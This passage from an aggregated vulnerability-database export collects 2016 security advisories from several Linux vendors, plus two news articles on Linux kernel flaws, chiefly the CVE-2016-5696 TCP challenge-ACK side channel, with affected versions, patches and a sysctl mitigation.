Description\n\nUSN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel. A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). ([CVE-2016-7039](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7039.html>))\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2016-6828](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6828.html>))\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). ([CVE-2016-6480](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6480.html>))\n\n# Affected Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including:\n * All versions prior to 3146.24\n * 3151.x versions prior to 3151.2\n * 3232.x versions prior to 3232.22\n * 3233.x versions prior to 3233.2\n * 3262.x versions prior to 3262.21\n * Other versions prior to 3263.7\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team recommends upgrading to the following BOSH stemcells:\n * Upgrade all versions prior to 3146.x to 3146.24\n * Upgrade 3151.x versions to 3151.2\n * Upgrade 3232.x versions to 3232.22\n * Upgrade 3233.x versions to 3233.2\n * Upgrade 3262.x versions to 3262.21\n * Upgrade other versions to 3263.7\n\n# Credit\n\nVladim\u00edr Bene\u0161, Marco Grassi, Pengfei Wang\n\n# References\n\n * <https://www.ubuntu.com/usn/usn-3099-2/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6480.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6828.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7039.html>\n", "edition": 5, "modified": "2016-10-01T00:00:00", "published": "2016-10-01T00:00:00", "id": "CFOUNDRY:DC8819DC530904F76913C7D9F499576C", "href": "https://www.cloudfoundry.org/blog/usn-3099-2/", "title": "USN-3099-2 Linux kernel vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2017-11-01T17:37:52", "bulletinFamily": "unix", "cvelist": [], "description": "No description provided", "modified": "2016-10-03T18:34:10", "published": "2016-10-03T18:34:10", "href": "https://access.redhat.com/security/vulnerabilities/challengeack", "id": "2438571", "type": "redhat", "title": "Shared challenge ack vulnerability - CVE-2016-5696", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-08-13T18:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS\ndepartment of University of California, Riverside, for reporting this issue.", "modified": "2018-03-19T16:29:53", "published": "2016-08-18T19:33:21", "id": "RHSA-2016:1632", "href": "https://access.redhat.com/errata/RHSA-2016:1632", "type": "redhat", "title": "(RHSA-2016:1632) Important: kernel-rt security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode() function where the nfs_have_writebacks() function reported a positive value for nfs_inode->npages. As a consequence, a kernel panic occurred. The provided patch performs a serialization by holding the inode i_lock over the check of PagePrivate and locking the request, which fixes this bug. (BZ#1365163)", "modified": "2016-09-27T17:31:16", "published": "2016-09-27T15:08:46", "id": "RHSA-2016:1939", "href": "https://access.redhat.com/errata/RHSA-2016:1939", "type": "redhat", "title": "(RHSA-2016:1939) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:40", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* When loading the Direct Rendering Manager (DRM) kernel module, the kernel panicked if DRM was previously unloaded. The kernel panic was caused by a memory leak of the ID Resolver (IDR2). With this update, IDR2 is loaded during kernel boot, and the kernel panic no longer occurs in the described scenario. (BZ#1353827)\n\n* When more than one process attempted to use the \"configfs\" directory entry at the same time, a kernel panic in some cases occurred. With this update, a race condition between a directory entry and a lookup operation has been fixed. As a result, the kernel no longer panics in the described scenario. (BZ#1353828)\n\n* When shutting down the system by running the halt -p command, a kernel panic occurred due to a conflict between the kernel offlining CPUs and the sched command, which used the sched group and the sched domain data without first checking the data. The underlying source code has been fixed by adding a check to avoid the conflict. As a result, the described scenario no longer results in a kernel panic. (BZ#1343894)\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1355980)\n\n* Previously, multiple Very Secure FTP daemon (vsftpd) processes on a directory with a large number of files led to a high contention rate on each inode's spinlock, which caused excessive CPU usage. With this update, a spinlock to protect a single memory-to-memory copy has been removed from the ext4_getattr() function. As a result, system CPU usage has been reduced and is no longer excessive in the described situation. (BZ#1355981)\n\n* When the gfs2_grow utility is used to extend Global File System 2 (GFS2), the next block allocation causes the GFS2 kernel module to re-read its resource group index. If multiple processes in the GFS2 module raced to do the same thing, one process sometimes overwrote a valid object pointer with an invalid pointer, which caused either a kernel panic or a file system corruption. This update ensures that the resource group object pointer is not overwritten. As a result, neither kernel panic nor file system corruption occur in the described scenario. (BZ#1347539)\n\n* Previously, the SCSI Remote Protocol over InfiniBand (IB-SRP) was disabled due to a bug in the srp_queue() function. As a consequence, an attempt to enable the Remote Direct Memory Access (RDMA) at boot caused the kernel to crash. With this update, srp_queue() has been fixed, and the system now boots as expected when RDMA is enabled. (BZ#1348062)\n\nEnhancement(s):\n\n* This update optimizes the efficiency of the Transmission Control Protocol (TCP) when the peer is using a window under 537 bytes in size. As a result, devices that use maximum segment size (MSS) of 536 bytes or fewer will experience improved network performance. (BZ#1354446)", "modified": "2018-06-06T20:24:11", "published": "2016-08-23T19:01:18", "id": "RHSA-2016:1664", "href": "https://access.redhat.com/errata/RHSA-2016:1664", "type": "redhat", "title": "(RHSA-2016:1664) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS\ndepartment of University of California, Riverside, for reporting this issue.", "modified": "2018-06-07T08:58:25", "published": "2016-08-18T19:32:31", "id": "RHSA-2016:1631", "href": "https://access.redhat.com/errata/RHSA-2016:1631", "type": "redhat", "title": "(RHSA-2016:1631) Important: realtime-kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS department of University of California, Riverside, for reporting this issue.", "modified": "2018-04-12T03:32:54", "published": "2016-08-18T19:37:10", "id": "RHSA-2016:1633", "href": "https://access.redhat.com/errata/RHSA-2016:1633", "type": "redhat", "title": "(RHSA-2016:1633) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* When an interrupt request occurred and the new API was scheduled on a different CPU, the enic driver previously generated a warning message. This behavior was caused by a race condition between the vnic_intr_unmask() function and the enic_poll_unlock_napi() function. This update fixes the napi_poll() function to unlock before unmasking the interrupt. As a result, the warning message no longer occurs in the described situation. (BZ#1351192)", "modified": "2016-09-06T13:28:58", "published": "2016-09-06T13:18:56", "id": "RHSA-2016:1815", "href": "https://access.redhat.com/errata/RHSA-2016:1815", "type": "redhat", "title": "(RHSA-2016:1815) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2016-12-09T17:30:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-7425", "CVE-2016-6828", "CVE-2015-7513", "CVE-2016-4997", "CVE-2013-4312", "CVE-2016-5195", "CVE-2016-3841", "CVE-2016-0823", "CVE-2016-4998"], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP4 RT kernel was updated to receive various\n security and bugfixes.\n\n This feature was added:\n\n - Support for the 2017 Intel Purley platform.\n\n The following security bugs were fixed:\n\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004418).\n - CVE-2016-0823: The pagemap_open function in fs/proc/task_mmu.c in the\n Linux kernel allowed local users to obtain sensitive physical-address\n information by reading a pagemap file, aka Android internal bug 25739721\n (bnc#994759).\n - CVE-2016-3841: The IPv6 stack in the Linux kernel mishandled options\n data, which allowed local users to gain privileges or cause a denial of\n service (use-after-free and system crash) via a crafted sendmsg system\n call (bnc#992566).\n - CVE-2016-6828: Use after free in tcp_xmit_retransmit_queue or other tcp_\n functions (bsc#994296)\n - CVE-2016-5696: net/ipv4/tcp_input.c in the Linux kernel did not properly\n determine the rate of challenge ACK segments, which made it easier for\n man-in-the-middle attackers to hijack TCP sessions via a blind in-window\n attack (bnc#989152)\n - CVE-2016-6480: Race condition in the ioctl_send_fib function in\n drivers/scsi/aacraid/commctrl.c in the Linux kernel allowed local users\n to cause a denial of service (out-of-bounds access or system crash) by\n changing a certain size value, aka a "double fetch" vulnerability\n (bnc#991608)\n - CVE-2016-4997: The compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE\n setsockopt implementations in the netfilter subsystem in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (memory corruption) by leveraging in-container root access to\n provide a crafted offset value that triggers an unintended decrement\n (bnc#986362).\n - CVE-2015-7513: arch/x86/kvm/x86.c in the Linux kernel did not reset the\n PIT counter values during state restoration, which allowed guest OS\n users to cause a denial of service (divide-by-zero error and host OS\n crash) via a zero value, related to the kvm_vm_ioctl_set_pit and\n kvm_vm_ioctl_set_pit2 functions (bnc#960689).\n - CVE-2013-4312: The Linux kernel allowed local users to bypass\n file-descriptor limits and cause a denial of service (memory\n consumption) by sending each descriptor over a UNIX socket closing it,\n related to net/unix/af_unix.c and net/unix/garbage.c (bnc#839104).\n - CVE-2016-7425: A buffer overflow in the Linux Kernel in\n arcmsr_iop_message_xfer() could have caused kernel heap corruption and\n arbitraty kernel code execution (bsc#999932)\n\n The following non-security bugs were fixed:\n\n - ahci: Order SATA device IDs for codename Lewisburg.\n - AHCI: Remove obsolete Intel Lewisburg SATA RAID device IDs.\n - ALSA: hda - Add Intel Lewisburg device IDs Audio.\n - avoid dentry crash triggered by NFS (bsc#984194).\n - blktap2: eliminate deadlock potential from shutdown path (bsc#909994).\n - blktap2: eliminate race from deferred work queue handling (bsc#911687).\n - bonding: always set recv_probe to bond_arp_rcv in arp monitor\n (bsc#977687).\n - bonding: fix bond_arp_rcv setting and arp validate desync state\n (bsc#977687).\n - btrfs: account for non-CoW'd blocks in btrfs_abort_transaction\n (bsc#983619).\n - btrfs: ensure that file descriptor used with subvol ioctls is a dir\n (bsc#999600).\n - cdc-acm: added sanity checking for probe() (bsc#993891).\n - cxgb4: Set VPD size so we can read both VPD structures (bsc#976867).\n - Delete patches.fixes/net-fix-crash-due-to-wrong-dev-in-calling.patch.\n (bsc#979514)\n - fs/cifs: fix wrongly prefixed path to root (bsc#963655, bsc#979681)\n - fs/select: add vmalloc fallback for select(2) (bsc#1000189).\n - fs/select: introduce SIZE_MAX (bsc#1000189).\n - i2c: i801: add Intel Lewisburg device IDs.\n - include/linux/mmdebug.h: should include linux/bug.h (bnc#971975 VM\n performance -- git fixes).\n - increase CONFIG_NR_IRQS 512 -> 2048 reportedly irq error with multiple\n nvme and tg3 in the same machine is resolved by increasing\n CONFIG_NR_IRQS (bsc#998399)\n - kabi, unix: properly account for FDs passed over unix sockets\n (bnc#839104).\n - kaweth: fix firmware download (bsc#993890).\n - kaweth: fix oops upon failed memory allocation (bsc#993890).\n - KVM: x86: SYSENTER emulation is broken (bsc#994618).\n - libfc: sanity check cpu number extracted from xid (bsc#988440).\n - lpfc: call lpfc_sli_validate_fcp_iocb() with the hbalock held\n (bsc#951392).\n - md: lockless I/O submission for RAID1 (bsc#982783).\n - mm: thp: fix SMP race condition between THP page fault and MADV_DONTNEED\n (VM Functionality, bnc#986445).\n - mpt2sas, mpt3sas: Fix panic when aer correct error occurred (bsc#997708).\n - net: add pfmemalloc check in sk_add_backlog() (bnc#920016).\n - netback: fix flipping mode (bsc#996664).\n - nfs: Do not drop directory dentry which is in use (bsc#993127).\n - nfs: Don't disconnect open-owner on NFS4ERR_BAD_SEQID (bsc#989261).\n - nfs: Don't write enable new pages while an invalidation is proceeding\n (bsc#999584).\n - nfs: Fix a regression in the read() syscall (bsc#999584).\n - nfs: Fix races in nfs_revalidate_mapping (bsc#999584).\n - nfs: fix the handling of NFS_INO_INVALID_DATA flag in\n nfs_revalidate_mapping (bsc#999584).\n - nfs: Fix writeback performance issue on cache invalidation (bsc#999584).\n - nfs: Refresh open-owner id when server says SEQID is bad (bsc#989261).\n - nfsv4: do not check MAY_WRITE access bit in OPEN (bsc#985206).\n - nfsv4: fix broken patch relating to v4 read delegations (bsc#956514,\n bsc#989261, bsc#979595).\n - nfsv4: Fix range checking in __nfs4_get_acl_uncached and\n __nfs4_proc_set_acl (bsc#982218).\n - pci: Add pci_set_vpd_size() to set VPD size (bsc#976867).\n - pciback: fix conf_space read/write overlap check.\n - powerpc: add kernel parameter iommu_alloc_quiet (bsc#994926).\n - ppp: defer netns reference release for ppp channel (bsc#980371).\n - random32: add prandom_u32_max (bsc#989152).\n - rpm/constraints.in: Bump x86 disk space requirement to 20GB Clamav tends\n to run out of space nowadays.\n - s390/dasd: fix hanging device after clear subchannel (bnc#994436).\n - sata: Adding Intel Lewisburg device IDs for SATA.\n - sched/core: Fix an SMP ordering race in try_to_wake_up() vs. schedule()\n (bnc#1001419).\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bnc#1002165).\n - sched: Fix possible divide by zero in avg_atom() calculation\n (bsc#996329).\n - scsi_dh_rdac: retry inquiry for UNIT ATTENTION (bsc#934760).\n - scsi: do not print "reservation conflict" for TEST UNIT READY\n (bsc#984102).\n - scsi: ibmvfc: add FC Class 3 Error Recovery support (bsc#984992).\n - scsi: ibmvfc: Fix I/O hang when port is not mapped (bsc#971989)\n - scsi: ibmvfc: Set READ FCP_XFER_READY DISABLED bit in PRLI (bsc#984992).\n - scsi_scan: Send TEST UNIT READY to LUN0 before LUN scanning\n (bnc#843236,bsc#989779).\n - tmpfs: change final i_blocks BUG to WARNING (bsc#991923).\n - Update\n patches.drivers/fcoe-0102-fcoe-ensure-that-skb-placed-on-the-fip_recv_list-\n are.patch (add bsc#732582 reference).\n - USB: fix typo in wMaxPacketSize validation (bsc#991665).\n - USB: validate wMaxPacketValue entries in endpoint descriptors\n (bnc#991665).\n - vlan: don't deliver frames for unknown vlans to protocols (bsc#979514).\n - vlan: mask vlan prio bits (bsc#979514).\n - xenbus: inspect the correct type in xenbus_dev_request_and_reply().\n - xen: x86/mm/pat, /dev/mem: Remove superfluous error message (bsc#974620).\n - xfs: Avoid grabbing ilock when file size is not changed (bsc#983535).\n - xfs: Silence warnings in xfs_vm_releasepage() (bnc#915183 bsc#987565).\n\n", "modified": "2016-12-09T18:11:19", "published": "2016-12-09T18:11:19", "id": "SUSE-SU-2016:3069-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00033.html", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "kernel-uek\n[3.8.13-118.10.2]\n- tcp: make challenge acks less predictable (Eric Dumazet) [Orabug: 24010012] [Orabug: 2401010] {CVE-2016-5696}\n[3.8.13-118.10.1]\n- ocfs2: call ocfs2_journal_access_di() before ocfs2_journal_dirty() in ocfs2_write_end_nolock() (yangwenfang) [Orabug: 19601200] \n- ocfs2: improve recovery performance (Junxiao Bi) [Orabug: 24395691] ", "edition": 4, "modified": "2016-08-15T00:00:00", "published": "2016-08-15T00:00:00", "id": "ELSA-2016-3595", "href": "http://linux.oracle.com/errata/ELSA-2016-3595.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:30", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "- [3.10.0-327.28.3.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.28.3]\n- [net] tcp: enable per-socket rate limiting of all 'challenge acks' (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] tcp: uninline tcp_oow_rate_limited() (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] tcp: make challenge acks less predictable (Florian Westphal) [1355603 1355605] {CVE-2016-5696}", "edition": 4, "modified": "2016-08-18T00:00:00", "published": "2016-08-18T00:00:00", "id": "ELSA-2016-1633", "href": "http://linux.oracle.com/errata/ELSA-2016-1633.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:00", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "kernel-uek\n[4.1.12-37.6.3]\n- tcp: make challenge acks less predictable (Eric Dumazet) [Orabug: 24010103] [Orabug: 2401010] {CVE-2016-5696}", "edition": 4, "modified": "2016-08-15T00:00:00", "published": "2016-08-15T00:00:00", "id": "ELSA-2016-3594", "href": "http://linux.oracle.com/errata/ELSA-2016-3594.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "[2.6.32-642.4.2]\n- [net] tcp: make challenge acks less predictable (Florian Westphal) [1355606 1355607] {CVE-2016-5696}\n[2.6.32-642.4.1]\n- [ipmi] Remove smi_msg from waiting_rcv_msgs list before handle_one_recv_msg() (David Arcari) [1355980 1347189]\n- [fs] ext4: Remove useless spinlock in ext4_getattr() (Lukas Czerner) [1355981 1315933]\n- [net] tcp: increase size at which tcp_bound_to_half_wnd bounds to > TCP_MSS_DEFAULT (Davide Caratti) [1354446 1349776]\n- [net] tcp: Prevent overzealous packetization by SWS logic (Davide Caratti) [1354446 1349776]\n- [fs] configfs: fix race between dentry put and lookup (Robert S Peterson) [1353828 1333448]\n- [drm] move idr2 implementation to lib (Milos Vyletel) [1353827 1316790]\n- [fs] cifs: Create dedicated keyring for spnego operations (Scott Mayhew) [1351670 1267754]\n- [infiniband] srp: Fix backport error in ib_srp::srp_queuecommand (Don Dutile) [1348062 1321094]\n- [fs] gfs2: don't set rgrp gl_object until it's inserted into rgrp tree (Robert S Peterson) [1347539 1344740]\n- [sched] avoid kernel panic during power off (Frank Ramsay) [1343894 1313035]", "edition": 4, "modified": "2016-08-23T00:00:00", "published": "2016-08-23T00:00:00", "id": "ELSA-2016-1664", "href": "http://linux.oracle.com/errata/ELSA-2016-1664.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "huawei": [{"lastseen": "2019-02-01T18:01:40", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2017-07-05T00:00:00", "published": "2016-09-07T00:00:00", "id": "HUAWEI-SA-20160907-01-TCP", "href": "https://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160907-01-tcp-en", "title": "Security Advisory - TCP Connection Hijack Vulnerability", "type": "huawei", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-01-27T09:18:10", "bulletinFamily": "info", "cvelist": ["CVE-2016-5696"], "description": "[](<https://4.bp.blogspot.com/-hEDa0CCUvq0/V6xQv40SogI/AAAAAAAApJE/_BPwDkHfi1c_pfqMblsyaLu5HvFLnCeCQCLcB/s1600/linux-server-tcp-packet-hacking.png>)\n\nIf you are using the Internet, there are the possibilities that you are open to attack. \n \nThe Transmission Control Protocol (TCP) implementation in all Linux systems deployed since 2012 (_version 3.6 and above of the Linux kernel_) poses a serious threat to Internet users, whether or not they use Linux directly. \n \nThis issue is troubling because Linux is used widely across the Internet, from web servers to Android smartphones, tablets, and smart TVs. \n \nResearchers have uncovered a serious Internet flaw, which if exploited, could allow attackers to terminate or inject malware into unencrypted communication between any two vulnerable machines on the Internet. \n \nThe vulnerability could also be used to forcefully terminate HTTPS encrypted connections and downgrade the privacy of secure connections, as well as also threatens anonymity of Tor users by routing them to certain malicious relays. \n \nThe flaw actually resides in the design and implementation of the **Request for Comments: 5961** ([RFC 5961](<https://tools.ietf.org/html/rfc5961>)) \u2013 a relatively new Internet standard that's designed to make commonly used TCP more robust against hacking attacks. \n \nTCP protocol is the heart of all Internet communications, as all application level protocols, including HTTP, FTP, SSH, Telnet, DNS, and SMTP, stand on TCP. \n \nWeb servers and other applications make use of TCP protocol to establish connections between hosts to transfer data between them. \n \nA team of six security researchers from the University of California, Riverside and the U.S. Army Research Laboratory has demonstrated a [proof-of-concept exploit](<https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/cao>) at the USENIX Security Symposium that can be used to detect if two hosts are communicating over TCP and ultimately attack that traffic. \n \n\n\n### No Need of Man-in-the-Attack Position\n\n[](<https://1.bp.blogspot.com/-NZwt4F_trEI/V6xJI7sa8BI/AAAAAAAApI0/FDCNjFwJYvApMupzfHdfP9NvEs9mqE1gQCLcB/s1600/linux-tcp-hacking.png>)\n\nTypically, TCP protocol assembles messages into a series of data packets that are identified by unique sequence numbers and transmitted to the receiver. When received, the data packets are then reassembled by the receiver into the original message. \n \nResearchers found that '**Side channels**' attack allows hackers to guess the TCP packet sequence numbers accurately within first 10 seconds of the attack by using no more information than just the IP addresses of both parties. \n \nThis means, an attacker with spoofed IP address does not need a man-in-the-middle (MITM) position, apparently intercepting and injecting malicious TCP packets between any two arbitrary machines on the Internet. \n \nThe researchers detailed their findings in the paper titled, '**Off-Path TCP Exploits: Global Rate Limit Considered Dangerous**' [[PDF](<http://www.cs.ucr.edu/~zhiyunq/pub/sec16_TCP_pure_offpath.pdf>)], which they presented at the conference, showing the audience how they injected a phishing form inside the USA Today website. \n\n\nYou can watch the video demonstration above that shows the attack in work. \n \n\n\n### Targeting the Tor Network\n\n \nThe researchers also show how the flaw ([CVE-2016-5696](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5696>)) can be exploited to break Secure Shell (SSH) connections and tamper with encrypted communications traveling over Tor anonymity network. \n\n\n> \"In general, we believe that a DoS [Denial of Service] attack against Tor connections can have a devastating impact on both the availability of the service as a whole and the privacy guarantees that it can provide,\" the paper reads. \n\n> \"The default policy in Tor is that if a connection is down between two relay nodes, say a middle relay and an exit relay, the middle relay will pick a different exit relay to establish the next connection. If an attacker can dictate which connections are down (via reset attacks), then the attacker can potentially force the use of certain exit relays.\"\n\nThe team also provided recommendations on how to mitigate the attack. \n \n\n\n### Here's How to Mitigate TCP Attack\n\n \nWhile patches to fix the vulnerability are developed and distributed for the current Linux kernel, as a workaround you can raise the ACK rate limit on your Linux machine or gadget to large values so that it cannot be reached. \n \nFor this, you are required to append the following to /etc/sysctl.conf: \n\n\n> net.ipv4.tcp_challenge_ack_limit = 999999999\n\nOnce done, use sysctl -p to activate the new rule. You need to perform root to do this. \n \nThe researchers also note that while Linux version 3.6 and above are vulnerable to this attack, Windows, OS X and FreeBSD are not believed to be vulnerable because they have not yet fully implemented RFC 5961.\n", "modified": "2016-08-11T13:03:17", "published": "2016-08-10T23:18:00", "id": "THN:B41554BF406DE03F01F4B7A7E4CD2A52", "href": "https://thehackernews.com/2016/08/linux-tcp-packet-hacking.html", "type": "thn", "title": "Linux TCP Flaw allows Hackers to Hijack Internet Traffic and Inject Malware Remotely", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-27T10:06:50", "bulletinFamily": "info", "cvelist": ["CVE-2016-5696"], "description": "[](<https://1.bp.blogspot.com/-BTKum11v1d8/V7MHT6Vy7OI/AAAAAAAApMU/v_XnTsEnvwA5lzrZWm6ya46y9oEe9AMSACLcB/s1600/android-hack-linux.png>)\n\nAn estimated 80 percent of Android smartphones and tablets running Android 4.4 KitKat and higher are vulnerable to a recently disclosed [Linux kernel flaw](<https://thehackernews.com/2016/08/linux-tcp-packet-hacking.html>) that allows hackers to terminate connections, spy on unencrypted traffic or inject malware into the parties' communications. \n \nEven the latest [Android Nougat](<https://thehackernews.com/2016/03/google-android-n-features.html>) Preview is considered to be vulnerable. \n \nThe security flaw was first appeared in the implementation of the TCP protocol in all Linux systems deployed since 2012 (version 3.6 and above of the Linux OS kernel) and the Linux Foundation has already patched the Linux kernel on July 11, 2016. \n \nHowever, the vulnerability ([CVE-2016-5696](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5696>)) is now affecting a large portion of the Android ecosystem. \n \nAccording to a [blog 